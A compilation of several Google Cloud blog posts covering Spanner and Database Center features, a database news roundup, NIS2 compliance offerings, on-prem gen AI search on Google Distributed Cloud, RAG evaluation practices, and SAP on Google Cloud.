BigQuery and Spanner better together: New, groundbreaking integrations between Spanner and BigQuery help businesses connect operational and analytical workloads, to unlock valuable insights and drive better decision-making. Spanner external datasets in BigQueryallows you to query transactional data residing in Spanner directly within BigQuery, without needing to move or duplicate data. Spanner now also supports reverse ETL from BigQuery to export data from BigQuery to Spanner, so you can operationalize the analytical insights that BigQuery enables.
5. Reliability, availability, security, and governance
Spanner customers expect the highest levels of reliability, availability, security, and governance controls for their mission-critical workloads. This year, we launched support for dual-region configurations and geo-partitioning to help you improve your availability SLAs, improve application performance for multi-region workloads, and meet governance requirements.
Dual-region support: Spanner dual-region configurations help meet local residency requirements while providing five 9s of availability and zero recovery-point objective (RPO) guarantees in geographies with only two regions.
Geo-partitioning: You can partition your table data at the row-level across the globe, to serve data closer to your users. With geo-partitioning, Spanner customers across industries like gaming, e-commerce, and financial services can provide theirusers reduced application latency, optimized costs, and data residency benefits such as storing sensitive user data within geographic jurisdictions.
At Google Cloud, we strive to make it ridiculously simple to build and manage applications built on our databases, including Spanner.
Protobuf improvements:Protocol Buffers, or protobuf, is a language-neutral way to encode and decode data structures for efficient transport and storage. You can now manage protobuf values in Spanner and access their fieldsusing the dot operator in SQL, e.g., dimensions.size.width, without having to normalize into tables upfront. This dramatically simplifies writing queries that need to filter, group, or order by specific values within a protobuf.
Troubleshooting and Database Center support: Database Center is an AI-powered unified database management solution to monitor and manage diverse database services. This year, customers started to be able to use Database Center to manage their Spanner databases. We also added support for end-to-end tracing and client tracing to make it easier to troubleshoot performance issues.
We are proud of what we have delivered for customers in 2024, and are excited to see the innovative solutions you are building on Spanner. Needless to say, we are just getting started and we have a lot more exciting capabilities lined up for 2025.
Get started
Want to learn more about what makes Spanner unique and how it’s being used today? Try it yourself for free for 90-days or for as little as $65 USD/month for a production-ready instance that grows with your business without downtime or disruptive re-architecture.
Google Cloud’s Database Center provides a unified fleet management solution to help manage your databases at scale. In October 2024, Database Center was made available to all Google Cloud customers, with support for Cloud SQL, AlloyDB and Spanner engines.
Today we are expanding Database Center’s capabilities with the addition of Bigtable, Memorystore, and Firestore databases in preview. You now have a single, unified view where you can:
Gain a comprehensive view of your entire database fleet across all Google Cloud managed databases. No more silos of information or hunting through bespoke tools and spreadsheets.
Proactively de-risk your database fleet with intelligent and actionable availability and data protection recommendations for Bigtable and Firestore databases.
Optimize your database fleet with AI-powered assistance using a natural language interface to answer questions about all your Google Cloud databases,and quickly resolve fleet issues through optimized recommendations.
Let’s take a deeper look at the new Database Center capabilities for Bigtable, Memorystore and FIrestore.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3e22bcecdb50>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
Gain a comprehensive view of your database fleet
Database Center simplifies database management with a single, unified view of all your Google Cloud managed database services, including Bigtable, Memorystore and Firestore. You can monitor these database resources across your entire organization, spanning multiple engines, versions, regions, projects, and environments or applications using labels. Specifically, Database Center now lets you:
Identify out-of-date database versions to ensure proper support and reliability
Track version upgrades, e.g., if Memorystore Redis 6.x to Memorystore Redis 7.0/ 7.2is updating at an expected pace
Ensure database resources are appropriately distributed, e.g., identify the number of Bigtable, Firestore, Memorystore databases powering the critical production applications vs. non-critical dev/test environments
Detecting and troubleshooting diverse database issues across the entire fleet.
Proactively de-risk your database fleet with intelligent recommendations
We’ve expanded Database Center’s proactive monitoring and issue-resolution capabilities to support Bigtable and Firestore, helping to ensure optimal availability and data protection for your existing database fleet. For instance, Database Center:
Proactively monitors Bigtable instances, detecting and helping to resolve failover gaps to minimize downtime and prevent service disruption
Publishes recommendations related to any unsuccessful backup attempts, no automated back-up policies and short back-up retention for your Bigtable instances. It’s important to address these issues quickly to ensure data can be recovered.
Enhances data availability and durability by protecting against system failures and regional outages for your Bigtable instances.
Helps safeguard your critical data in Firestore by detecting if any tables lack an automated backup policy, so you can prevent data loss from accidents or corruption
In short, when issues arise, Database Center guides you through intuitive troubleshooting steps, streamlining resolution and minimizing downtime for your Bigtable and Firestore deployments. It goes beyond problem identification to provide clear, actionable solutions. Recommendations for Memorystore are coming to Database Center soon along with additional recommendations for other engines!
Detecting and troubleshooting diverse database issues across the entire fleet.
Optimize your database fleet with AI-powered assistance
With Gemini enabled, Database Center makes optimizing your database fleet incredibly intuitive. Chat with the AI-powered interface to get precise answers, uncover issues within your database fleet, troubleshoot problems, and implement solutions. AI-powered chat in the Database Center now includes support for Bigtable, Memorystore and Firestore. For example, Gemini can help you quickly identify Firestoreresources that do not have automated back-up policies.
A natural language Interface to ask questions about Bigtable, Memorystore and Firestore databases.
Get started with Database Center today
With today’s launch, Database Center now provides you a single, unified view across all your Google Cloud managed databases. You can access the Database Center within the Google Cloud console and begin monitoring and managing your entire database fleet. To learn more about Database Center’s capabilities, check out the documentation.
As the year winds down and we gather around the (digital) fireplace, the excitement around Google Cloud databases is ramping up! It’s been a busy season of innovation and customer success, and we’ve got a sack full of updates to share. Join us for a festive feast of news, including key announcements in the databases space, cool product updates and feature notes, inspiring customer stories, and a calendar of events to ring in the new year. So grab a cup of hot cocoa, settle in, and let’s unwrap the latest happenings from Google Cloud databases.
Key database announcements
[Forrester Wave] Google was named a Leader in The Forrester Wave™: Translytical Data Platforms, Q4 2024 report, earning the highest score possible in 11 criteria, including vision, innovation, gen AI/LLM, real-time analytics, and data security. We believe this recognition solidifies AlloyDB as Google Cloud’s fastest-growing database and a top choice for supporting transactional and analytical workloads with exceptional performance, availability, and scale.
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud databases’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee2451e9760>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/products?#databases’), (‘image’, None)])]>
Advanced DR for PostgreSQL and MySQLnow in GA – Advanced DR, a combination of switchover and replica failover along with a write Eendpoint (in Preview), provides seamless disaster recovery testing and execution without requiring application changes.
Cloud SQL Enterprise Plus for PostgreSQL and MySQL got two new features that improve availability:
Data cache enable/disable– Allows users to enable or disable data cache with near-zero downtime for MySQL and PostgreSQL primary instances.
Instance scaledown – Near-zero downtime is now available for infrequent instance scaledowns on Enterprise Plus for MySQL and PostgreSQL primary instances.
Private Service Connect (PSC) Automation is in Preview – Customers can automate the creation of Cloud SQL PSC endpoints in their VPCs. This dramatically simplifies the deployment of Cloud SQL using PSC especially at scale.
Cloud SQL Studio now supports IAM Authentication for MySQL and PostgreSQL (doc).
AlloyDB for PostgreSQL
Model endpoint management allows customers to access third-party and custom hosted models directly from their database. The extension enabling AI model predictions and embedding generation is now installed by default in new databases. Vertex AI’s latest models are available with no setup.
Single shard clusters – Memorystore for Redis Cluster is now GA. This enables customers to create Memorystore instances with a single shard, and dynamically scale the instance size up or down while maintaining their 99.99% SLA with multi-zone instances having replicas.
Node-level metrics – Memorystore for Redis Cluster is now GA. Node-level metrics empower Memorystore customers with the advanced monitoring capabilities to better manage their clusters.
OSS Autoscaler – Memorystore Cluster now in GA – OSS autoscaler ensures that customer clusters are automatically optimized for performance, capacity, and budget.
Directed reads feature is now GA – Spanner provides the flexibility to route read traffic (except in RW transactions) to a specific replica type or region within a multi-region instance configuration or a custom regional configuration with optional read-only region(s).
Query Optimizer version 7 is now in GA – Spanner’s query optimizer now rewrites OR operators on indexed columns as a UNION MERGE, improving efficiency by avoiding full table scans
Usage statistics and insights dashboard for database splits is now GA – Spanner’s new observability feature helps identify and address performance hotspots by showing how data is distributed across splits (slide).
Firestore Key Access Justifications (KAJ) is now GA – Key access justifications provide customers with more control over data access and the ability to manage key access requests.
Monitoring page on Firestore console allows customers to view available metrics, create a custom dashboard, and set alerts directly from the Firestore console.
Businesses transforming with Google Cloud databases
Discover how Google Cloud database solutions are driving innovation and success:
Ford Pro Intelligence leverages Google Cloud’s Bigtable to harness the power of connected vehicle data, providing real-time insights and predictive maintenance for fleets of all sizes.
Fire up your innovation engine with Spanner: Today’s applications demand more than traditional databases can deliver. In this webinar, we explore Spanner, the ‘always-on’ globally available database that scales effortlessly to power your next-generation innovations.
Maximize performance with Cloud SQL and Memorystore: In this webinar, we’ll show you the combined power of CloudSQL and Memorystore in order to reduce costs, improve efficiency, and deliver exceptional application experiences.
Cloud Wars with Bob Evans In this episode of Cloud Wars, Bobby Brauer, head of geospatial data engineering at Bayer, discusses their innovative use of AlloyDB. Bayer is using AlloyDB to overcome data challenges in agriculture. AlloyDB provides low-latency data processing and high availability, crucial for handling spikes in data flow during harvest season. Learn how Bayer is transforming geospatial data processing to enhance efficiency and drive data-driven decision-making.
Merv Adrian x Apex Fintech | AlloyDB In the rapidly evolving PostgreSQL DBMS landscape, AlloyDB is emerging as a top choice for organizations with demanding workloads. Join Merv Adrian for an interview with Apex Fintech, a leading provider of brokerage and wealth management services, as they share their experience with AlloyDB and how it helps them achieve high availability and robust security.
Get started
Google Cloud offers the only suite of industry-leading databases built on planet-scale infrastructure and for AI. Learn more and start a free trial today:
With the European Commission’s adoption of the Network and Information Systems Directive 2.0, or NIS2, Europe is taking an essential step forward in its strategy to protect consumers, businesses, and government organizations from escalating threats in cyberspace. NIS2 will help to drive a consistent high level of security and resilience across key sectors of the European economy.
NIS2 also represents a seismic shift in the expectations and obligations of private entities to adhere to cybersecurity best practices, and to factor security into everyday business decisions. For European organizations, including Google Cloud customers, NIS2 may require new investments in security tools, talent, and processes to achieve a higher overall security baseline. Customers should consider this an opportunity to use the cloud as a platform for managing risk and for streamlining compliance.
Google Cloud and Google Workspace offer a range of tools and resources to help customers meet their NIS2 compliance goals through building secure and resilient applications, managing cyber risks, responding to incidents, and enabling new modes of business built atop a secure foundation.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee2458edc10>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
NIS2: Compliance challenge or opportunity?
NIS2 outlines new security requirements for tens of thousands of essential and important entities in critical sectors, including energy, transportation, healthcare, financial services, and digital infrastructure. Covered entities must adopt risk management practices, establish business continuity plans, enhance supply chain security practices, develop cyber hygiene and training programs, and implement more rigorous minimum security controls.
In addition, entities must report “significant” cyber incidents to the relevant national authorities. Failure to comply could lead to enforcement measures including costly fines and reputational damage.
NIS2 and other regulations are already translating into higher cybersecurity spending. European organizations expect to allocate an average of 9% of their IT budgets on security in 2024 – up from 7.1% in 2023, according to recent research by ENISA, the European Agency for Cybersecurity.
Still, organisations continue to struggle to hire and retain sufficient numbers of skilled cybersecurity professionals. As a result, organisations that succeed in driving down the complexity and cost of meeting their NIS2 requirements will be at a competitive advantage over those who do not.
At Google Cloud, we believe in shared fate and in our commitment to support customers as a trusted partner in their security and compliance journeys. We provide customers industry-leading tools to enhance visibility into their online assets and to address risks.
We can help customers achieve a higher security baseline through strong inherited controls, such as encryption and multi-factor authentication (MFA). For example, Google Workspace customers experienced three times fewer incidents than those using Microsoft 365, according to a study by cyber-insurer At Bay.
We also simplify IT lifecycle management and enable customers to focus on managing their businesses, rather than managing technical debt. We also partner closely with regulators to build trust and to support customer regulatory compliance needs on-demand.
For these reasons, European customers should strongly consider partnering with Google Cloud to meet their compliance goals.
How Google Cloud can help our customers achieve their NIS2 goals
Google Cloud offers a set of solutions and resources to help guide customers through their NIS2 compliance journey.
Risk management:Under NIS2, covered organizations must take appropriate information risk management measures based on international and European standards, including performing risk assessments and implementing a risk treatment plan.
First, with management now accountable for managing cyber risks under NIS2, we offer a range of free educational resources on the topic of risk governance, including best practice guides and our Insights Hubs for CISOs and for boards of directors. Even before moving to the cloud, organizations can use our Risk Assessment and Critical Asset Discovery solution to evaluate their current IT risks, identify where critical assets reside, and view recommendations for improving their security posture and resilience.
Once in the cloud, customers can take advantage of Google Cloud Monitoring to view the real-time performance, availability, and health of their applications and infrastructure. Security Command Center Enterprise provides organizations visibility into their security posture and empowers them to surface and remediate vulnerabilities and misconfigurations.
Partnering with Google Cloud also allows customers to take advantage of our extensive compliance offerings, best practices, and easy access to documentation. Our products routinely undergo independent verification of security, privacy, and compliance controls captured in frameworks such as ISO/IEC 27001, which is aligned to NIS2 requirements referenced in the draft ENISA Implementing Guidance.
Incident handling:NIS2 requires covered entities to monitor for cyber threats and notify national authorities of significant incidents within 24 hours, file a detailed incident report within 72 hours, and issue a comprehensive final report within one month.
For incident management in the cloud, Google Security Operations (SecOps) offers security practitioners a modern platform for threat monitoring, detection, investigation, and response. The SecOps platform provides organizations the ability to tap into insights from Google Threat Intelligence to track novel threats, as well as analyze petabytes of telemetry and collaborate on cases using a single platform. Built-in generative AI unlocks the ability to create custom incident playbooks on-demand to accelerate response and reporting.
Google Cloud customers and non-customers alike can tap into Mandiant Incident Response services for in-depth forensic analysis, crisis management support, and recovery operations.
Google Cloud will notify customers of service disruptions impacting the underlying products and services they rely on using programmatic alerts via our Personalized Service Health Dashboard and via public dashboards. Google Cloud also notifies customers of security and privacy incidents via Advisory Notifications.
Business continuity:NIS2 requires organizations to implement tools and processes to ensure business continuity in the event of significant cyber incidents, including establishing an incident response team or creating backups.
There is growing recognition among customers and policymakers that cloud-based tools offer advantages in sustaining a high level of operational resilience. We perform rigorous disaster recovery testing to ensure our infrastructure will continue to run despite a range of disaster scenarios. Our data centers are certified as ISO/IEC 22301 compliant after undergoing an independent audit.
Minimum security requirements:NIS2 requires covered organizations to adopt basic security controls and technologies, such as encryption, MFA, and identity and access management.
Customers can review our whitepaper on how we design security into Google Cloud infrastructure from the ground up. Our security model starts with overlapping physical security measures to protect Google data centers and network infrastructure. We use specially-designed Titan hardware security chips to authenticate legitimate Google devices and to verify the integrity of the software components.
Zero trust is at the core of Google Cloud’s security model: our infrastructure continuously authenticates and authorizes every identity, device, and service to prevent lateral movement on the network. We encrypt customer data at-rest and communications in-transit between data centers.
As a covered entity, Google Cloud will be responsible for meeting cyber risk management and incident handling requirements under NIS2 while supporting our customers along their compliance journeys. We are working closely with national authorities to demonstrate the strength of our security model and our compliance with all NIS2 requirements.
NIS2 requires covered entities to implement strong supply chain risk management measures, including the need to codify minimum security requirements in supplier contracts and service level agreements. Customers can learn more about Google Cloud’s contractual responsibilities with respect to physical security, vulnerability management, incident notification, personnel skills and training, and subprocessor security by reviewing our Cloud Data Processing Addendum. Please contact your Google Cloud representative for further details.
To help European organizations train and hire the next generation of cybersecurity professionals, we’ve awarded thousands of scholarships for the Google Cybersecurity Certificate program. In addition, Google.org will award $15 million over the next year to support hands-on cybersecurity education at universities across Europe, Africa, and the Middle East as part of our Cybersecurity Seminars program.
We’re also proud to support the European Union and EU member states in efforts to combat malicious cyber activity targeting European businesses, governments, and individuals. Our cybersecurity teams already collaborate closely with more than a dozen European governments to share intelligence and disrupt threats. Customers and partners of all sizes can take advantage of free threat analysis resources we publish on our Threat Intelligence blog.
NIS2 represents an essential step forward in strengthening Europe’s collective cyber resilience. As a technology provider and security innovator, Google Cloud will continue to support our customers as we work together to build a safer Internet for all.
Today, generative AI is giving organizations new ways to process and analyze data, discover hidden insights, increase productivity and build new applications. However, data sovereignty, regulatory compliance, and low-latency requirements can be a challenge. The need to keep sensitive data in certain locations, adhere to strict regulations, and respond swiftly can make it difficult to capitalize on the cloud’s innovation, scalability, and cost-efficiency advantages.
Google Distributed Cloud (GDC) brings Google’s AI services anywhere you need them — in your own data center or at the edge. Designed with AI and data-intensive workloads in mind, GDC is a fully managed hardware and software solution featuring a rich set of services. It comes in a range of extensible hardware form factors, with leading industry independent software vendor (ISV) solutions integrated via GDC Marketplace, and your choice of whether to run it connected to Google Cloud’s systems or air-gapped from the public internet.
In this blog post, we dive into the details of how GDC’s new AI-optimized servers with NVIDIA H100 Tensor Core GPUs and our gen AI search packaged solution — now available in preview — allow you to bring increasingly popular retrieval-augmented generation (RAG) to your on-premises environment, and unlock multimodal and multilingual natural-language search experiences across your text, image, voice, and video data.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3ee24586faf0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Gen AI-optimized infrastructure
GDC air-gapped now incorporates new servers with NVIDIA H100 GPUs, powered by the advanced NVIDIA Hopper architecture and the 5th Gen Intel Xeon Scalable processors. The new servers introduce the new GPU-optimized A3 VM family optimized for NVIDIA NVLink interconnect to GDC, enabling faster shared compute and memory for AI workloads using large language models (LLMs) with up to 100 billion parameters. It also extends the set of NVIDIA Multi-Instance GPU (MIG) profiles, supporting a variety of new GPU slicing schemes (both uniform and mixed-mode) and dynamic allocation of GPU resources to serve the needs of AI services with better ownership costs.
Ready-to-deploy on-prem conversational search
With GDC’s new gen AI Search solution, you get a ready-to-deploy, on-prem conversational search solution based on the Gemma 2 LLM with 9 billion parameters. You can easily ingest your sensitive on-prem data into the search solution and quickly find the most relevant information and content via natural language search, boosting employee productivity and knowledge sharing, while helping ensure that the search queries and data remain on-prem.
Responses also include citation links to your original documents so you can easily verify all answers to reduce hallucinations. Watch the demo below to see the solution in action:
For more accurate responses, the GDC gen AI search solution relies on a RAG architecture to combine the benefits of traditional search and generative AI, and user queries are augmented with relevant on-prem data before they’re sent to the LLM to generate responses. Other core integrations available out-of-box include Vertex AI pre-trained APIs (translation for 105 languages, speech-to-text for 13 languages, and optical character recognition for 46 supported and 24 experimental languages) for multimodal and multilingual data ingestion across text, images, and audio. It also includes the AlloyDB Omni database service for embeddings storage and semantic search across ingested data.
GDC’s open cloud approach also allows you to customize this solution according to your needs and swap any components as you see fit, including for other database services like Elasticsearch, other open-source models and LLMs, or your own proprietary models.
Get started on your GDC development journey
To join GDC’s gen AI search solution preview and experience how on-prem gen AI search can transform how your organization retrieves information, contact your Google account representative. Note that you will need a GDC deployment where you can deploy and run the preview.
Retrieval-augmented generation (RAG) supercharges large language models (LLMs) by connecting them to real-time, proprietary, and specialized data. This helps LLMs deliver more accurate, relevant, and contextually aware responses, minimizing hallucinations and building trust in AI applications.
But RAG can be a double-edged sword: while the concept is straightforward – find relevant information and feed it to the LLM – its implementation is difficult to master. Done incorrectly, it can impact user trust in your AI’s reliability. The culprit is often a lack of thorough evaluation. RAG systems that are not thoroughly evaluated lead to ‘silent failures’ which can undermine the reliability and trustworthiness of the system as a whole.
In this blog post, we’ll equip you with a series of best practices to identify issues within your RAG system and fix them with a transparent, automated evaluation framework.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebee2b12640>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/vertex-ai/’), (‘image’, None)])]>
Step 1. Create a testing framework
Testing a RAG system consists of running a set of queries against the tool and evaluating the output. A key prerequisite for rapid testing and iteration is to decide on a set of metrics as the definition of success, and calculate them in a rigorous, automated, and repeatable fashion. Below are some guidelines:
Assemble a test dataset of high-quality questions
Ensure that your test set covers a broad subset of the underlying data, and includes variations in phrasing and question complexity that match real-world use cases.
Pro tip: It’s a good idea to consult with stakeholders and end users here to ensure the quality and relevance of this dataset.
Assemble a ‘golden’ reference dataset of desired outputs to use in evaluation
Although some metrics can be calculated without a reference dataset, having a set of known-good outputs allows us to produce a more comprehensive and nuanced range of evaluation metrics.
Only change one variable at a time between test runs
There are many features of a RAG pipeline that can make a difference – by changing them one at a time, we can be sure that a change in evaluation scores is attributable to a single feature alone.
Similarly, we must ensure that between test runs we do not change the evaluation questions being used, the reference answers, or any system-wide parameters and settings.
The basic process here is to change one aspect of the RAG system, run the battery of tests, adapt the feature, run the exact same battery of tests again and then see how the test results have changed. Once you are satisfied that a feature cannot be improved, freeze the configuration and move on to testing a separate part of the process.
This testing framework can be visualized as three components:
Reference questions and answers:
The set of queries to be evaluated. Depending on which metrics are being calculated we may include corresponding reference answers.
RAG processes
The retrieval and summarization techniques being changing and evaluated
Question outputs
The evaluation outputs as scored by the testing framework
Choosing appropriate metrics
Establishing the best metrics to assess your system involves trial and error. Predefined testing frameworks exist that have been designed to speed up the process by providing prebuilt metrics that can also be adapted to your specific use case. This allows you to quickly generate baseline scores for the evaluation and refinement of your RAG system. From this baseline, you can then systematically modify retrieval and generation capabilities and measure any improvements.
Common RAG evaluation frameworks include:
Ragas
Ragas is an open-source tool for evaluating RAG systems. It measures key aspects like factual accuracy, answer relevance, and how well retrieved content matches the question. Ragas also helps generate test data, making it easier for developers to improve RAG systems for accuracy and usefulness.
Vertex AI gen AI evaluation service
The Vertex AI gen AI evaluation service helps users test and compare generative models or applications based on custom metrics. It supports model selection, prompt engineering, and fine-tuning and allows users to define metrics, prepare data, run evaluations, and review results. The service works with Google’s models, third-party models, and open models across various languages, using both model-based and computation-based assessment methods.
Example metrics
Model-based metrics utilize a proprietary Google model to assess the output of a candidate model. Functioning as an evaluator, this model scores responses based on predefined criteria.
Pointwise metrics: The judge model assigns a numerical score (e.g., on a scale of 0-5) to the candidate model’s output, indicating its alignment with the evaluation criteria. A higher score signifies a better fit.
Pairwise metrics: The judge model compares the responses of two models and identifies the superior one. This approach is frequently employed to benchmark a candidate model against a baseline model.
Computation-based metrics: These metrics utilize mathematical formulas to compare the model’s output against a ground truth or reference. Popular examples include ROUGE and BLEU.
Opinionated tiger team actions
Collaborate with stakeholders to develop a set of “golden” question inputs. These questions should accurately reflect the main use cases the RAG system is intended to address. It’s crucial to include a diverse range of query types, such as simple, complex, multi-part, and misspelled queries to ensure comprehensive testing.
Make use of the Vertex AI generative AI evaluation framework. This framework allows developers to quickly implement multiple test metrics, and run multiple tests on a model’s performance with minimal setup. It offers a fast feedback loop, so improvements can be made rapidly.
Conduct a pointwise evaluation of the RAG retrieval system.
Generate model scores based on the following criteria:
Response groundedness: The extent to which the generated text aligns with the factual information retrieved from the source documents.
Verbosity: The length and detail of the response. While beneficial for providing comprehensive understanding, excessive verbosity may indicate difficulty in concisely and accurately answering the question. You may wish to tune this metric based on your use case.
Instruction following: The system’s ability to generate text that accurately and comprehensively adheres to given instructions, ensuring the output is relevant and aligned with user intent.
Question answer quality as related to instructions: The ability of the RAG system to generate text that correctly answers a user’s question with a high level of detail and coherence.
Store results in a shared location such as Vertex AI Experiments, which allows for simple comparisons over time.
Step 2. Root cause analysis and iterative testing
The goal of setting up a repeatable testing framework is ideally understanding the root cause of issues. RAG is fundamentally based on two components: (1) the retrieval accuracy of your nearest neighbor matches and (2) the context that you provide to the LLM that generates your responses.
Identifying and isolating these components individually allows you to determine the specific areas that may be causing problems and formulating testable hypotheses that can be performed as experiments and run in Vertex AI using the Gen AI evaluation framework.
Typically when performing a root cause analysis exercise, the user will execute a testing run as a baseline, modify the implementation of one of the RAG components, and re-execute the testing run. The delta between the output scores of the testing metrics is the influence of the RAG component that was altered. The goal in this phase is to modify and document the components carefully, aiming to optimize towards a maximum score for each of the chosen metrics. Often the temptation is to make multiple modifications between testing runs which can mask the impact of a specific process and whether it was successful in creating a measurable change in your RAG system.
Examples of RAG experiments to run
Example RAG components to experiment with:
What is the ideal number of neighbors for a document chunk that gets passed into an LLM to improve answer generation?
How does embedding model choice affect retrieval accuracy?
How do different chunking strategies affect quality? For example, adjusting variables like chunk size or overlap, or exploring strategies such as pre-processing chunks to summarize or paraphrase them with a language model.
When it comes to generation, simply comparing Model A vs. Model B or Prompt A vs. Prompt B is particularly useful for fine-tuning prompt design or adjusting model configurations, helping developers to optimize models and prompts for specific use cases.
What happens when you enrich documents with metadata like title, author, and tags for better retrieval signals?
Opinionated tiger team actions
Test model A vs model B for generation tasks (simple and can produce measurable results)
Test chunking strategies for retrieval within a single embedding model (400 chars, 600 chars, 1200 chars, Full document text)
Test pre-processing of long chunks to summarize them to smaller chunk sizes.
Test what data is passed to the LLM as context. For example, do we pass the matched chunks themselves, or use these as a lookup to find the source document and pass the whole document text to the LLM, making use of long context windows.
Step 3. Human evaluation
Although quantitative metrics created by your testing framework provide valuable data, qualitative feedback from real users is also crucial. Automated testing tools are efficient for scalability and rapid iteration, but they cannot replicate human judgment in ensuring high-quality output. Human testers can evaluate subtle aspects like the tone of responses, the clarity of explanations, and potential ambiguity. Combining qualitative and quantitative testing provides a more holistic understanding of your RAG system’s performance.
Human tests are typically run after you’ve achieved a solid level of baseline answer quality by optimizing evaluation metrics through the automated testing framework. You may wish to include human response evaluation as part of your broader user-testing motions for the system as a whole, such as performance, UX, etc. Similar to previous experiments, human testers can focus on specific system features following structured steps, or they can assess the overall application and provide comprehensive qualitative feedback.
Because human testing is time consuming and repetitive, it is essential to identify users who are engaged and willing to provide meaningful feedback.
Opinionated tiger team actions
Identify key personas based on the RAG system’s target users
Recruit a representative sample of participants that matches these personas to ensure realistic feedback.
If possible, include both technical and non-technical user groups for testing
Sit with the user (if possible) to ask follow-up questions and dig into the detail of their responses
Conclusion
To begin your own evaluation, explore Google Cloud’s generative AI evaluation service, where you can create both prebuilt and custom evaluation methodologies to enhance your RAG system.
As the 2027 end of support for SAP Business Suite 7 approaches, SAP customers need to decide where to deploy as they upgrade to cloud-based S/4HANA and RISE with SAP. This represents a great opportunity to get more value out of your enterprise data, and take advantage of the longstanding partnership between Google Cloud and SAP. RISE with SAP on Google Cloud lets you accelerate innovation and reduce costs through a secure, reliable, and scalable high-performance infrastructure. By deploying SAP on Google Cloud, you can accelerate your ERP transformation with a unique, unified data experience that offers leading integration, analytics accelerators, and AI innovations to bring clarity from data to decisions.
Two data powerhouses unite
Key to the Google Cloud-SAP partnership is the integration between BigQuery, a fully managed, AI-ready data analytics platform that helps you maximize value from your data, and SAP Datasphere. BigQuery is designed to be multi-engine, multi-format, and multi-cloud. This integration lets you access your most critical data in real time without duplication thanks to co-engineered data replication and federation technologies. This joint capability can unify data from SAP software systems, such as SAP S/4HANA and SAP HANA Cloud, providing organizations with a comprehensive view of their most important data on Google Cloud and letting you:
Simplify data landscapes. Federate queries across SAP Datasphere and BigQuery to blend data from SAP and non-SAP software. This minimizes common data silos from sources that span marketing, sales, purchasing, finance, supply chain, manufacturing and more.
Improve decision-making. Gain a more holistic view of your data and leverage powerful analytics to drive better decision-making. Now, you can plan with a single, comprehensive view of your businesses by connecting SAP data to powerful data and analytics tools such as Vertex AI to analyze financial and business outcomes while improving the accuracy of models.
Add rich context to your analytics. BigQuery makes it easy to bring in Google and third-party data sources such as Trends, Weather, Maps, world events and Enterprise application data with Google Cloud Cortex Framework’s pre-built accelerators.
Use SAP Business Technology Platform (SAP BTP) globally on Google Cloud. SAP is advancing its multi-cloud offerings by expanding regional support of SAP BTP and SAP HANA Cloud on Google Cloud, which includes support for SAP Analytics Cloud and SAP Datasphere. SAP and Google Cloud intend to launch SAP BTP in five new regions, building to a total of eight regions supported by 2025.
aside_block
<ListValue: [StructValue([(‘title’, ‘Try Google Cloud for free’), (‘body’, <wagtail.rich_text.RichText object at 0x3e892e5851c0>), (‘btn_text’, ‘Get started for free’), (‘href’, ‘https://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Transform your business with AI
Google Cloud has powerful, easy-to-use tools to help you incorporate your SAP data into predictive and generative AI initiatives. Vertex AI provides a single, integrated development platform where you can build sophisticated predictive and generative AI agents and experiences faster — without any manual ETL.
Innovate freely with Model Garden, a curated collection of over 150 machine learning models. Google is the only cloud provider to offer widely used first-party, third-party, and open-source models, so you can easily discover and choose foundation models based on modality, size, performance, latency, and cost.
Leverage Google’s most powerful model yet. Gemini is Google’s most capable and general family of LLMs, offering four models each built for its own set of use cases. Google Cloud recently announced multiple Gemini updates that enable SAP users to bring more gen AI capabilities to SAP workloads and access Google Cloud’s large language models through SAP GenAI Hub.
Get more from your models by augmenting and grounding them with SAP data. Leverage Vertex AI Model Builder’s managed tooling for extensions, function calling, and grounding. Customize Gemini models in an efficient, lower-cost way with supervised tuning.
Easily deploy, manage, and monitor agents with Vertex AI Agent Builder, which lets you quickly create a range of generative AI agents grounded with Google Search and your SAP data with the convenience of a no-code agent builder console.
Run SAP today on tomorrow’s infrastructure
Google Cloud helps SAP customers build quickly, securely, and cost effectively with the next generation of infrastructure designed to meet specific workload and industry needs. Google Cloud infrastructure is optimized for AI, cloud-first, enterprise workloads with an emphasis on security, scalability, and data sovereignty.
Leverage superior scale-up machine types. Google Cloud is the sole provider of 32TB SAP-certified machines, simplifying architecture, deployments, and administration. More recently, Google Cloud introduced memory-optimized X4 instances, which provide the largest SAP-certified compute instances in the cloud market, supporting up to 32TB SAP HANA workloads.
Accelerate time to value. Google Cortex for SAP Framework delivers pre-built analytical and AI models based on SAP data models and with out-of-the-box integration with SAP. Cortex comes with pre-built dashboards for visualizing SAP data and enriches data with AI/ML services and external data sets such as weather, search trends, ads impressions, and more.
Increase agility and scalability. Unlike on-premises infrastructure, Google Cloud offers on-demand scalability to massive scale if needed, allowing you to easily adjust resources based on changing business needs. This agility can be crucial for responding to market fluctuations or unexpected growth.
Improve performance and efficiency. Google Cloud’s infrastructure is designed for high performance and reliability. This can lead to faster processing times and reduced latency for your SAP applications, improving overall efficiency and the user experience.
A highly secure cloud. While customers are growing concerned about the recent increase in DDoS attacks, threat vulnerability, and security-born outages, Google Cloud’s customers have been appreciative of our consistency in availability. With robust security features and compliance certifications, Google Cloud can help give you peace of mind knowing your data is secure and your business meets regulatory requirements.
Meet sustainability goals. SAP and Google Cloud are exploring ways to combine SAP Datasphere with broader ESG data sets and insights powered by Google Cloud to accelerate sustainability journeys with actionable insights.
Real-world results with RISE on Google Cloud
SAP customers are already getting more out of their technology investments by migrating to Google Cloud.
